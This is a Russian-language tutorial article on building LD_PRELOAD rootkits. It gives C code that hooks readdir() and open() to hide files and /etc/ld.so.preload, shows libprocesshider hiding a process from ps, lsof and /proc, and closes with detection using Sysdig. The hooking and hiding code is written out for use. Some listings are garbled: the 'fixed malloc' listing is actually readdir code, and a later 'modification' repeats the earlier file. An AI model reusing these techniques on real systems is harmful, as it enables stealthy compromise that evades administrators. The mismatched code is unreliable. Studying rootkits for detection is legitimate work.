Содержание
В никсах существует переменная среды, при указании которой ваши библиотеки будут загружаться раньше остальных. А это значит, что появляется возможность подменить системные вызовы. Называется переменная LD_PRELOAD, и в этой статье мы подробно обсудим ее значение в сокрытии (и обнаружении!) руткитов.
Еще по теме: Способы получить права root в Linux
Официально главное предназначение LD_PRELOAD — отладка или проверка функций в динамически подключаемых библиотеках. Если не хотите исправлять и перекомпилировать саму библиотеку, то можно воспользоваться переменной среды.
К примеру, если нам нужно предзагрузить библиотеку ld.so, то у нас будет два способа:
- Установить переменную среды LD_PRELOAD с файлом библиотеки.
- Записать путь к библиотеке в файл /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload.
В первом случае мы объявляем переменную с библиотекой для текущего пользователя и его окружения. Во втором же наша библиотека будет загружена раньше остальных для всех пользователей системы.
Нам интересен как раз второй способ: именно он часто используется в руткитах для перехвата некоторых вызовов, таких как чтение файла, листинг директории, процессов и прочих функций, позволяющих злоумышленнику скрывать свое присутствие в системе.
Переопределение системных вызовов
Прежде чем мы начнем сближение с реальными функциями руткитов, давайте на небольшом примере покажу, как можно перехватить вызов стандартной функции malloc().
Для этого напишем простую программу, которая выделяет блок памяти с помощью функции malloc(<wbr />), затем помещает в него функцией strncpy(<wbr />) строку I'll <wbr />be <wbr />back и выводит ее посредством fprintf(<wbr />) по адресу, который вернула malloc(<wbr />).
Создаем файл call_malloc.<wbr />c:
|
1 2 3 4 5 6 7 8 9 10 |
#include #include #include #include int main() { char *alloc = (char *)malloc(0x100); strncpy(alloc, "I'll be back\0", 14); fprintf(stderr, "malloc(): %p\nStr: %s\n", alloc, alloc); } |
Теперь напишем программу, переопределяющую malloc(<wbr />). Внутри — функция с тем же именем, что и в libc. Наша функция не делает ничего, кроме вывода строки в STDERR c помощью fprintf(<wbr />). Создадим файл libmalloc.<wbr />c:
|
1 2 3 4 5 6 7 8 9 |
#define _GNU_SOURCE #include #include #include void *malloc(size_t size) { fprintf(stderr, "\nHijacked malloc(%ld)\n\n", size); return 0; } |
Теперь с помощью GCC скомпилируем наш код:
|
1 2 3 4 5 6 7 |
$ ls call_malloc.c libmalloc.c $ gcc -Wall -fPIC -shared -o libmalloc.so libmalloc.c -ldl $ gcc -o call_malloc call_malloc.c $ ls call_malloc call_malloc.c libmalloc.c libmalloc.so |
Выполним нашу программу call_malloc:
|
1 2 3 |
$ ./call_malloc malloc(): 0x5585b2466260 Str: I'll be back |
Посмотрим, какие библиотеки использует наша программа, с помощью утилиты ldd:
|
1 2 3 4 |
$ ldd ./call_malloc linux-vdso.so.1 (0x00007fff0cd81000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f0d35c74000) /lib64/ld-linux-x86-64.so.2 (0x00007f0d35e50000) |
Отлично видно, что без использования предзагрузчика LD_PRELOAD стандартно загружаются три библиотеки:
- linux-vdso.<wbr />so.<wbr />1 — представляет собой виртуальный динамический разделяемый объект (Virtual Dynamic Shared Object, VDSO), используемый для оптимизации часто используемых системных вызовов. Его можно игнорировать (подробнее — man <wbr />7 <wbr />vdso).
- libc.<wbr />so.<wbr />6 — библиотека libc с используемой нами функцией malloc(<wbr />) в программе call_malloc.
- ld-linux-x86-64.<wbr />so.<wbr />2 — сам динамический компоновщик.
Теперь давайте определим переменную LD_PRELOAD и попробуем перехватить malloc(<wbr />). Здесь я не буду использовать export и ограничусь однострочной командой для простоты:
|
1 2 3 |
$ LD_PRELOAD=./libmalloc.so ./call_malloc Hijacked malloc(256) Ошибка сегментирования |
Мы успешно перехватили malloc(<wbr />) из библиотеки libc.<wbr />so, но сделали это не совсем чисто. Функция возвращает значение указателя NULL, что при разыменовании strncpy(<wbr />) в программе ./<wbr />call_malloc вызывает ошибку сегментирования. Исправим это.
Еще по теме: Перехват вызовов функций WinAPI
Обработка сбоев
Чтобы иметь возможность незаметно выполнить полезную нагрузку руткита, нам нужно вернуть значение, которое вернула бы первоначально вызванная функция. У нас есть два способа решить эту проблему:
- наша функция malloc(<wbr />) должна реализовывать функциональность malloc(<wbr />) библиотеки libc по запросу пользователя. Это полностью избавит от необходимости использовать malloc(<wbr />) из libc.<wbr />so;
- libmalloc.<wbr />so каким‑то образом должна иметь возможность вызывать malloc(<wbr />) из библиотеки libc и возвращать результаты вызывающей программе.
Каждый раз при вызове malloc(<wbr />) динамический компоновщик вызывает версию malloc(<wbr />) из libmalloc.<wbr />so, поскольку это первое вхождение malloc(<wbr />). Но мы хотим вызвать следующее вхождение malloc(<wbr />) — то, что находится в libc.<wbr />so.
Так происходит потому, что динамический компоновщик внутри использует функцию dlsym(<wbr />) из /<wbr />usr/<wbr />include/<wbr />dlfcn.<wbr />h для поиска адреса загруженного в память.
По умолчанию в качестве первого аргумента для dlsym(<wbr />) используется дескриптор RTLD_DEFAULT, который возвращает адрес первого вхождения символа. Однако есть еще один псевдоуказатель динамической библиотеки — RTLD_NEXT, который ищет следующее вхождение. Используя RTLD_NEXT, мы можем найти функцию malloc(<wbr />) библиотеки libc.<wbr />so.
Отредактируем libmalloc.<wbr />с. Комментарии объясняют, что происходит внутри программы:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
#define _GNU_SOURCE #include #include #include #include #include // Определяем макрос, который является // названием скрываемого файла #define RKIT "rootkit.so" // Здесь все то же, что и в примере с malloc() struct dirent* (*orig_readdir)(DIR *) = NULL; struct dirent *readdir(DIR *dirp) { if (orig_readdir == NULL) orig_readdir = (struct dirent*(*)(DIR *))dlsym(RTLD_NEXT, "readdir"); // Вызов orig_readdir() для получения каталога struct dirent *ep = orig_readdir(dirp); while ( ep != NULL && !strncmp(ep->d_name, RKIT, strlen(RKIT)) ) ep = orig_readdir(dirp); return ep; } |
В цикле проверяется, не NULL ли значение директории, затем вызывается strncmp(<wbr />) для проверки, совпадает ли d_name каталога с RKIT (файла с руткитом). Если оба условия верны, вызывается функция orig_readdir(<wbr />) для чтения следующей записи каталога. При этом пропускаются все директории, у которых d_name начинается с rootkit.<wbr />so.
Теперь давайте посмотрим, как отработает наша библиотека в этот раз. Снова компилируем и смотрим на результат работы:
|
1 2 3 4 5 |
$ gcc -Wall -fPIC -shared -o libmalloc.so libmalloc.c -ldl $ LD_PRELOAD=./libmalloc.so ./call_malloc Hijacked malloc(256) malloc(): 0x55ca92740260 Str: I'll be back |
Отлично! Как мы видим, все прошло гладко. Сначала при первом вхождении malloc(<wbr />) была использована наша реализация этой функции, а затем оригинальная реализация из библиотеки libc.<wbr />so.
Теперь, когда мы понимаем, как работает LD_PRELOAD и каким образом мы можем предопределять работу со стандартными функциями системы, самое время применить эти знания на практике.
Попробуем сделать так, чтобы утилита ls, когда выводит список файлов, пропускала руткит.
Скрываем файл из листинга ls
Большинство динамически скомпилированных программ используют системные вызовы стандартной библиотеки libc. С помощью утилиты ldd посмотрим, какие библиотеки использует программа ls:
|
1 2 3 4 |
$ ldd /bin/ls ... libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1ade498000) ... |
Получается, ls динамически скомпилирована с использованием функций библиотеки libc.<wbr />so. Теперь посмотрим, какие системные вызовы для чтения директории использует утилита ls. Для этого в пустой директории выполним ltrace <wbr />ls:
|
1 2 3 4 5 6 7 8 |
$ ltrace ls memcpy(0x55de4a72e9b0, ".\0", 2) = 0x55de4a72e9b0 __errno_location() = 0x7f3a35b07218 opendir(".") = 0x55de4a72e9d0 readdir(0x55de4a72e9d0) = 0x55de4a72ea00 readdir(0x55de4a72e9d0) = 0x55de4a72ea18 readdir(0x55de4a72e9d0) = 0 closedir(0x55de4a72e9d0) = 0 |
Очевидно, что при выполнении команды без аргументов ls использует системные вызовы opendir(<wbr />), readdir(<wbr />) и closedir(<wbr />), которые входят в библиотеку libc. Давайте теперь задействуем LD_PRELOAD и переопределим эти стандартные вызовы своими. Напишем простую библиотеку, в которой изменим функцию readdir(<wbr />), чтобы она скрывала наш файл с кодом.
Здесь мы уже переходим к написанию простого руткита без нагрузки. Все, что он будет делать, — это прятать сам себя от глаз администратора системы.
Я создал директорию rootkit и дальше буду работать в ней. Создадим файл rkit.<wbr />c.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
#define _GNU_SOURCE #include #include #include #include #include #define RKIT "rootkit.so" #define LD_PL "ld.so.preload" struct dirent* (*orig_readdir)(DIR *) = NULL; struct dirent *readdir(DIR *dirp) { if (orig_readdir == NULL) orig_readdir = (struct dirent*(*)(DIR *))dlsym(RTLD_NEXT, "readdir"); struct dirent *ep = orig_readdir( dirp ); while ( ep != NULL && ( !strncmp(ep->d_name, RKIT, strlen(RKIT)) || !strncmp(ep->d_name, LD_PL, strlen(LD_PL)) )) { ep = orig_readdir(dirp); } return ep; } |
Компилируем и проверяем работу:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
$ gcc -Wall -fPIC -shared -o rootkit.so rkit.c -ldl $ ls -lah итого 28K drwxr-xr-x 2 n0a n0a 4,0K ноя 23 23:46 . drwxr-xr-x 4 n0a n0a 4,0K ноя 23 23:33 .. -rw-r--r-- 1 n0a n0a 496 ноя 23 23:44 rkit.c -rwxr-xr-x 1 n0a n0a 16K ноя 23 23:46 rootkit.so $ LD_PRELOAD=./rootkit.so ls -lah итого 12K drwxr-xr-x 2 n0a n0a 4,0K ноя 23 23:46 . drwxr-xr-x 4 n0a n0a 4,0K ноя 23 23:33 .. -rw-r--r-- 1 n0a n0a 496 ноя 23 23:44 rkit.c |
Нам удалось скрыть файл rootkit.<wbr />so от посторонних глаз. Пока мы тестировали библиотеку исключительно в пределах одной команды.
Используем /etc/ld.so.preload
Давайте воспользуемся записью в /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload для сокрытия нашего файла от всех пользователей системы. Для этого запишем в ld.<wbr />so.<wbr />preload путь до нашей библиотеки:
|
1 2 3 4 5 6 |
# ls rkit.c rootkit.so # echo $(pwd)/rootkit.so > /etc/ld.so.preload # ls rkit.c |
Теперь мы скрыли файл ото всех пользователей (хотя это не совсем так, но об этом позже). Но опытный администратор довольно легко нас обнаружит, так как само по себе наличие файла /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload может говорить о присутствии руткита — особенно если раньше такого файла не было.
Скрываем ld.so.preload
Давайте попытаемся скрыть из листинга и сам файл ld.<wbr />so.<wbr />preload. Немного модифицируем код rkit.<wbr />c:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
#define _GNU_SOURCE #include #include #include #include #include #define RKIT "rootkit.so" #define LD_PL "ld.so.preload" struct dirent* (*orig_readdir)(DIR *) = NULL; struct dirent *readdir(DIR *dirp) { if (orig_readdir == NULL) orig_readdir = (struct dirent*(*)(DIR *))dlsym(RTLD_NEXT, "readdir"); struct dirent *ep = orig_readdir( dirp ); while ( ep != NULL && ( !strncmp(ep->d_name, RKIT, strlen(RKIT)) || !strncmp(ep->d_name, LD_PL, strlen(LD_PL)) )) { ep = orig_readdir(dirp); } return ep; } |
Для наглядности я добавил к предыдущей программе еще один макрос LD_PL c именем файла ld.<wbr />so.<wbr />preload, который мы также добавили в цикл while, где сравниваем имя файла для скрытия.
После компиляции исходный файл rootkit.<wbr />so будет перезаписан и из вывода утилиты ls пропадет и нужный файл ld.<wbr />so.<wbr />preload. Проверяем:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ gcc -Wall -fPIC -shared -o rootkit.so rkit.c -ldl $ ls rkit.c $ ls /etc/ ... ldap tmpfiles.d ld.so.cache ucf.conf ld.so.conf udev ld.so.conf.d udisks2 libao.conf ufw libaudit.conf update-motd.d libblockdev UPower ... |
Здорово! Мы только что стали на один шаг ближе к полной конспирации. Вроде бы это победа, но не спешите радоваться.
Погружаемся глубже
Попробуем проверить, сможем ли мы прочитать файл ld.<wbr />so.<wbr />preload командой cat:
|
1 2 |
$ cat /etc/ld.so.preload /root/rootkit/src/rootkit.so |
Так‑так‑так. Получается, мы плохо спрятались, если наличие нашего файла можно проверить простым чтением. Почему так вышло?
Очевидно, что для получения содержимого утилита cat вызывает другую функцию — не readdir(<wbr />), которую мы так старательно переписывали. Что ж, посмотрим, что использует cat:
|
1 2 3 4 5 6 7 8 |
$ ltrace cat /etc/ld.so.preload ... __fxstat(1, 1, 0x7ffded9f6180) = 0 getpagesize() = 4096 open("/etc/ld.so.preload", 0, 01) = 3 __fxstat(1, 3, 0x7ffded9f6180) = 0 posix_fadvise(3, 0, 0, 2) = 0 ... |
На этот раз нам нужно поработать с функцией open(<wbr />). Поскольку мы уже опытные, добавим в наш руткит функцию, которая при обращении к файлу /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload будет вежливо говорить, что файла не существует (Error no entry или просто ENOENT).
Снова модифицируем rkit.<wbr />c:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
#define _GNU_SOURCE #include #include #include #include #include #include // Добавляем путь, который использует open() // для открытия файла /etc/ld.so.preload #define LD_PATH "/etc/ld.so.preload" #define RKIT "rootkit.so" #define LD_PL "ld.so.preload" struct dirent* (*orig_readdir)(DIR *) = NULL; // Сохраняем указатель оригинальной функции open int (*o_open)(const char*, int oflag) = NULL; struct dirent *readdir(DIR *dirp) { if (orig_readdir == NULL) orig_readdir = (struct dirent*(*)(DIR *))dlsym(RTLD_NEXT, "readdir"); struct dirent *ep = orig_readdir( dirp ); while ( ep != NULL && ( !strncmp(ep->d_name, RKIT, strlen(RKIT)) || !strncmp(ep->d_name, LD_PL, strlen(LD_PL)) )) { ep = orig_readdir(dirp); } return ep; } // Работаем с функцией open() int open(const char *path, int oflag, ...) { char real_path[PATH_MAX]; if(!o_open) o_open = dlsym(RTLD_NEXT, "open"); realpath(path, real_path); if(strcmp(real_path, LD_PATH) == 0) { errno = ENOENT; return -1; } return o_open(path, oflag); } |
Здесь мы добавили кусок кода, который делает то же самое, что и с readdir(<wbr />). Компилируем и проверяем:
|
1 2 3 |
$ gcc -Wall -fPIC -shared -o rootkit.so rkit.c -ldl $ cat /etc/ld.so.preload cat: /etc/ld.so.preload: Нет такого файла или каталога |
Так гораздо лучше, но это еще далеко не все варианты обнаружения /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload.
Мы до сих пор можем без проблем удалить файл, переместить его со сменой названия (и тогда ls снова его увидит), поменять ему права без уведомления об ошибке. Даже bash услужливо продолжит его имя при нажатии на Tab.
В хороших руткитах, эксплуатирующих лазейку с LD_PRELOAD, реализован перехват следующих функций:
- listxattr, llistxattr, flistxattr;
- getxattr, lgetxattr, fgetxattr;
- setxattr, lsetxattr, fsetxattr;
- removexattr, lremovexattr, fremovexattr;
- open, open64, openat, creat;
- unlink, unlinkat, rmdir;
- symlink, symlinkat;
- mkdir, mkdirat, chdir, fchdir, opendir, opendir64, fdopendir, readdir, readdir64;
- execve.
Разбирать подмену каждой из них мы, конечно же, не будем. Можете в качестве примера перехвата перечисленных функций посмотреть руткит cub3 — там все те же dlsym(<wbr />) и RTLD_NEXT.
Скрываем процесс с помощью LD_PRELOAD
При работе руткиту нужно как‑то скрывать свою активность от стандартных утилит мониторинга, таких как lsof, ps, top.
Мы уже довольно детально разобрались, как работает переопределение функций LD_PRELOAD. Для процессов все то же самое. Более того, стандартные программы используют в своей работе procfs, виртуальную файловую систему, которая представляет собой интерфейс для взаимодействия с ядром ОС.
Чтение и запись в procfs реализованы так же, как и в обычной файловой системе. То есть, как вы можете догадаться, наш опыт с readdir(<wbr />) здесь придется кстати.
libprocesshider
Как скрыть активность из мониторинга, предлагаю рассмотреть на хорошем примере libprocesshider, который разработал Джанлука Борелло (Gianluca Borello), автор Sysdig.com (о Sysdig и методах обнаружения руткитов LD_PRELOAD мы поговорим в конце статьи).
Теперь скопируем код с GitHub и разберемся, что к чему:
|
1 2 3 4 |
$ git clone https://github.com/gianlucaborello/libprocesshider $ cd libprocesshider $ ls evil_script.py Makefile processhider.c README.md |
В описании к libprocesshider все просто: делаем make, копируем в /<wbr />usr/<wbr />local/<wbr />lib/ и добавляем в /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload. Сделаем все, кроме последнего:
|
1 2 3 |
$ make $ gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl $ sudo mv libprocesshider.so /usr/local/lib/ |
Посмотрим, каким образом ps получает информацию о процессах. Для этого запустим ltrace:
|
1 2 3 4 5 6 7 8 9 10 |
$ ltrace /bin/ps ... time(0) = 1606208519 meminfo(0, 4096, 0, 0x7f1787ce9207) = 0 openproc(96, 0, 0, 0) = 0x55c6f9f145c0 readproc(0x55c6f9f145c0, 0x55c6f8258580, 0x7f1787651010, 0) = 0x55c6f8258580 readproc(0x55c6f9f145c0, 0x55c6f8258580, 0, 7) = 0x55c6f8258580 readproc(0x55c6f9f145c0, 0x55c6f8258580, 0, 5) = 0x55c6f8258580 readproc(0x55c6f9f145c0, 0x55c6f8258580, 0, 5) = 0x55c6f8258580 ... |
Информацию о процессе получаем при помощи функции readproc(<wbr />). Посмотрим реализацию этой функции в файле readproc.<wbr />c:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
static int simple_nextpid(PROCTAB *restrict const PT, proc_t *restrict const p) { static struct direct *ent; char *restrict const path = PT->path; for (;;) { ent = readdir(PT->procfs); if(unlikely(unlikely(!ent) || unlikely(!ent->d_name))) return 0; if(likely(likely(*ent->d_name > '0') && likely(*ent->d_name <= '9'))) break; } p->tgid = strtoul(ent->d_name, NULL, 10); p->tid = p->tgid; memcpy(path, "/proc/", 6); strcpy(path+6, ent->d_name); return 1; } |
Из этого кода понятно, что PID процессов получают, вызывая readdir(<wbr />) в цикле for. Другими словами, если нет директории процесса — нет и самого процесса для утилит мониторинга. Приведу пример части кода libprocesshider, где уже знакомым нам методом мы скрываем директорию процесса:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
... while(1) { dir = original_##readdir(dirp); if(dir) { char dir_name[256]; char process_name[256]; if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && strcmp(dir_name, "/proc") == 0 && get_process_name(dir->d_name, process_name) && strcmp(process_name, process_to_filter) == 0) { continue; } } break; } return dir; ... |
Причем само имя процесса get_process_name(<wbr />) берется из /<wbr />proc/<wbr />pid/<wbr />stat.
Проверим наши догадки. Для этого запустим предлагаемый evil_script.<wbr />py в фоне:
|
1 2 |
$ ./evil_script.py 1.2.3.4 1234 & [1] 3435 |
3435 — это PID нашего работающего процесса evil_script.<wbr />py. Проверим вывод утилиты htop и убедимся, что evil_script.<wbr />py присутствует в списке процессов.
Проверим вывод ps и lsof для обнаружения сетевой активности:
|
1 2 3 4 5 6 |
$ sudo ps aux | grep evil_script.py root 3435 99.5 0.4 19272 8260 pts/1 R 11:48 63:20 /usr/bin/python ./evil_script.py 1.2.3.4 1234 root 3616 0.0 0.0 6224 832 pts/0 S+ 12:52 0:00 grep evil_script.py $ sudo lsof -ni | grep evil_scri evil_scri 3435 root 3u IPv4 41410 0t0 UDP 192.168.232.138:52676->1.2.3.4:1234 |
Теперь посмотрим, существует ли директория с PID процесса evil_script.<wbr />py:
|
1 2 3 4 5 6 7 8 9 10 11 |
$ sudo ls /proc | grep 3435 3435 $ cat /proc/3435/status Name: evil_script.py Umask: 0022 State: R (running) Tgid: 3435 Ngid: 0 Pid: 3435 ... |
Все предсказуемо. Теперь самое время добавить библиотеку libprocesshider.<wbr />so в предзагрузку глобально для всей системы. Пропишем ее в /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload:
|
1 |
# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload |
Проверяем директорию /<wbr />proc, а также вывод lsof и ps.
|
1 2 3 4 |
$ ls /proc | grep 3435 $ lsof -ni | grep evil_scri ps aux | grep evil_script.py root 3707 0.0 0.0 6244 900 pts/0 S+ 13:10 0:00 grep evil_script.py |
Результат налицо. Теперь в /<wbr />proc нельзя посмотреть директорию с PID скрипта evil_script.<wbr />py. Однако статус процесса по‑прежнему виден в файле /<wbr />proc/<wbr />3435/<wbr />status.
|
1 2 3 4 5 6 7 8 |
$ cat /proc/3435/status Name: evil_script.py Umask: 0022 State: R (running) Tgid: 3435 Ngid: 0 Pid: 3435 ... |
Подытожим. В первой части статьи мы изучили методы перехвата функций и их изменение, что позволяет скрывать руткиты. А дальше проделали то же самое для скрытия процессов от стандартных утилит мониторинга.
Как вы догадываетесь, простые руткиты, несмотря на все хитрости, поддаются детекту. Например, при помощи разных манипуляций с файлом /<wbr />etc/<wbr />ld.<wbr />so.<wbr />preload или изучения используемых библиотек при помощи ldd.
Но что делать, если автор руткита настолько хорош, что захукал все возможные функции, ldd молчит, а подозрения на сетевую или иную активность все же есть?
Sysdig как решение
В отличие от стандартных инструментов, утилита Sysdig устроена по‑другому. По архитектуре она близка к таким продуктам, как libcap, tcpdump и Wireshark.
Специальный драйвер sysdig-probe перехватывает системные события на уровне ядра, после чего активируется функция ядра tracepoints, которая, в свою очередь, запускает обработчики этих событий. Обработчики сохраняют информацию о событии в совместно используемом буфере. Затем эта информация может быть выведена на экран или сохранена в текстовом файле.
Посмотрим, как с помощью Sysdig найти evil_script.<wbr />py. К примеру, по загрузке центрального процессора:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
$ sudo sysdig -c topprocs_cpu CPU% Process PID --------------------------------------------- 99.00% evil_script.py 5979 2.00% sysdig 5997 0.00% sshd 928 0.00% wpa_supplicant 474 0.00% systemd 909 0.00% exim4 850 0.00% sshd 938 0.00% su 948 0.00% in:imklog 472 0.00% in:imuxsock 472 |
Можно посмотреть выполнение ps. Бонусом Sysdig покажет, что динамический компоновщик загружал пользовательскую библиотеку libprocesshide раньше, чем libc:
|
1 2 3 4 5 6 7 8 |
$ sudo sysdig proc.name = ps 2731 00:21:52.721054253 1 ps (3351) < execve res=0 exe=ps args=aux. tid=3351(ps) pid=3351(ps) (out)ptid=3111(bash) cwd=/home/gianluca fdlimit=1024 pgft_maj=0 pgft_min=62 vm_size=512 vm_rss=4 vm_swap=0 ... 2739 00:21:52.721129329 1 ps (3351) < open fd=3(/usr/local/lib/libprocesshider.so) name=/usr/local/lib/libprocesshider.so flags=1(O_RDONLY) mode=0 2740 00:21:52.721130670 1 ps (3351) > read fd=3(/usr/local/lib/libprocesshider.so) size=832 ... 2810 00:21:52.721293540 1 ps (3351) > open 2811 00:21:52.721296677 1 ps (3351) < open fd=3(/lib/x86_64-linux-gnu/libc.so.6) name=/lib/x86_64-linux-gnu/libc.so.6 flags=1(O_RDONLY) mode=0 2812 00:21:52.721297343 1 ps (3351) > read fd=3(/lib/x86_64-linux-gnu/libc.so.6) size=832 ... |
Схожие функции предоставляют утилиты SystemTap, DTrace и его свежая полноценная замена — BpfTrace.
Еще по теме: Создание VPN-туннеля в Linux для доступа во внутреннюю сеть
